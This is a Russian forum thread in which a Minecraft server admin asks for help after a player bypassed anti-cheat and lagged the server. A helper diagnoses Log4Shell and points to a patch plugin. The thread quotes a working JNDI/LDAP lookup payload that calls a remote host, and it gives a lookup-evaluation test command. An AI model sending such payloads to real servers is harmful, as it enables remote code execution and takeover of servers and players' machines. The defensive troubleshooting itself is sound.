Помогите Лазейки и фичи в бесплатных плагинах

Nemnogo_idiot · 21 фев 2022

Тема такая, прошу вас сильно мне помочь, у нас есть сервер как все уже поняли и после захода человека который смог обойти NoCheat+ и летать без доната в хабе и на сервере он начал откисать (но мы его забанили конечно сразу, но не прекратилось), атак ботами или как такового ддоса не было ни в консоли, нигде. Всё по цп озу стабильно, tps gc в норме но иногда сильно просаживались, он написал что он якобы разработчик и знает про плагины, получается в них есть дыра? Могли бы вы скинуть дыры в плагинах либо помочь как знаете, просто всё и стабильно но иногда серваку плохо, что убрать что заменить?
Список:
PluginConstructorAPI, PlaceholderAPI, Spicord, UltimateAutoRestart, PlugMan, BetterChairs, MegaVanish, DynPad, Holograms, CommandPlayTime, DonatCase, RogueParkour, UltraEmerald, SuperTrails, MineTimesFilter, ViaVersion, HideStream, ViaBackwards, X-TimePass, LuckPerms, RainbowArmour, EasyPayments, ClearLag, CrackShot, WorldBorder, BlockSyntax, MineMessage, Clans, ProtocolLib, HamsterAPI, NoCheatPlus, SecondThreadAPI, FastAsyncWorldEdit, iDisguise, DrugsFTW, PrefiX, KNotlhosApi, Panilla, ExploitFixer, SimpleJail, CustomJoinItems, PlugManX, Tops, Vault, SimpleSit, BetterCaptcha, ViaRewind, ChatGames, DrinksCMD, SGranter, Marriage, SkinsRestorer, AuctionHouse, Images, ChestCommands, GCoreLegacy, SystemBord, WorldEdit, Essentials, CommandBlocker, AdvancedBan, Elevator, BanAnnouncer, DecoHeads, ItemFixer, BannerMaker, TimeIsMoney, TAB, ChatEx, MineResetLite, mKing, WorldGuard, GSlotMachine, EssentialsProtect, BanItem, EssentialsSpawn, PvPManager, TitleManager, FrameProtect, LimitedWorldEdit, RandomTP, Citizens, MoneyHunters, WGExtender, PiggyBack, AntiRelog, aLuckyBlock, CommandNPC, Blacksmith, dtlTraders
Upd1- Написал что использовал ${jndi:ldap://2448382079:1389/a} либо просто похожее

Pelmeshik · 20 фев 2022

Nemnogo_idiot сказал(а): ↑

Темав такая, прошу вас сильно мне помочь, у нас есть сервер как все уже поняли и после захода человека который смог обойти NoCheat+ и летать без доната в хабе и на сервере он начал откисать (но мы его забанили конечно сразу, но не прекратилось), атак ботами или как такового ддоса не было ни в консоли, нигде. Всё по цп озу стабильно, tps gc в норме но иногда сильно просаживались, он написал что он якобы разработчик и знает про плагины, получается в них есть дыра? Могли бы вы скинуть дыры в плагинах либо помочь как знаете, просто всё и стабильно но иногда серваку плохо, что убрать что заменить?
Список:
PluginConstructorAPI, PlaceholderAPI, Spicord, UltimateAutoRestart, PlugMan, BetterChairs, MegaVanish, DynPad, Holograms, CommandPlayTime, DonatCase, RogueParkour, UltraEmerald, SuperTrails, MineTimesFilter, ViaVersion, HideStream, ViaBackwards, X-TimePass, LuckPerms, RainbowArmour, EasyPayments, ClearLag, CrackShot, WorldBorder, BlockSyntax, MineMessage, Clans, ProtocolLib, HamsterAPI, NoCheatPlus, SecondThreadAPI, FastAsyncWorldEdit, iDisguise, DrugsFTW, PrefiX, KNotlhosApi, Panilla, ExploitFixer, SimpleJail, CustomJoinItems, PlugManX, Tops, Vault, SimpleSit, BetterCaptcha, ViaRewind, ChatGames, DrinksCMD, SGranter, Marriage, SkinsRestorer, AuctionHouse, Images, ChestCommands, GCoreLegacy, SystemBord, WorldEdit, Essentials, CommandBlocker, AdvancedBan, Elevator, BanAnnouncer, DecoHeads, ItemFixer, BannerMaker, TimeIsMoney, TAB, ChatEx, MineResetLite, mKing, WorldGuard, GSlotMachine, EssentialsProtect, BanItem, EssentialsSpawn, PvPManager, TitleManager, FrameProtect, LimitedWorldEdit, RandomTP, Citizens, MoneyHunters, WGExtender, PiggyBack, AntiRelog, aLuckyBlock, CommandNPC, Blacksmith, dtlTraders
Upd1- Написал что использовал ${jndi:ldap://2448382079:1389/a} либо просто похожее
Нажмите, чтобы раскрыть...

На счёт upd1 это Log4shell уязвимость. Надо билд ядра обновлять и поставить плагин https://github.com/FrankHeijden/Log4jFix/releases/tag/v1.0.5 . Это уязвимость библиотеки которая используется в ядре и она опасна те что могут завладеть и компами игроков так и самим сервером

Pelmeshik · 20 фев 2022

Проверить действует ли эта уязвимость можна командой /say ${date:YYYY} если в консоле выводит год значит уязвимость есть, если нет то нет

Nemnogo_idiot · 20 фев 2022

Спасибо, но вот написало что уязвимости нету но он всё равно это делает, да и + он может дюпать 64 всего и головы себе брать когда они обычно ограничиваются либо пропадают (он без гм).

Pelmeshik · 21 фев 2022

Nemnogo_idiot сказал(а): ↑

Спасибо, но вот написало что уязвимости нету но он всё равно это делает, да и + он может дюпать 64 всего и головы себе брать когда они обычно ограничиваются либо пропадают (он без гм).
Нажмите, чтобы раскрыть...

Эта команда не 100% процентов говорит. Лучше всё же установить плагин https://github.com/FrankHeijden/Log4jFix/releases/tag/v1.0.5

Nemnogo_idiot · 21 фев 2022

Pelmeshik сказал(а): ↑

Эта команда не 100% процентов говорит. Лучше всё же установить плагин https://github.com/FrankHeijden/Log4jFix/releases/tag/v1.0.5
Нажмите, чтобы раскрыть...

Спасибо

Войти или зарегистрироваться

Помогите Лазейки и фичи в бесплатных плагинах

Nemnogo_idiot Ньюби

Pelmeshik Активный участник Пользователь

Pelmeshik Активный участник Пользователь

Nemnogo_idiot Ньюби

Pelmeshik Активный участник Пользователь

Nemnogo_idiot Ньюби

Поделиться этой страницей

Войти или зарегистрироваться

Помогите Лазейки и фичи в бесплатных плагинах

Nemnogo_idiot Ньюби

Pelmeshik Активный участник Пользователь

Pelmeshik Активный участник Пользователь

Nemnogo_idiot Ньюби

Pelmeshik Активный участник Пользователь

Nemnogo_idiot Ньюби

Поделиться этой страницей

Быстрый поиск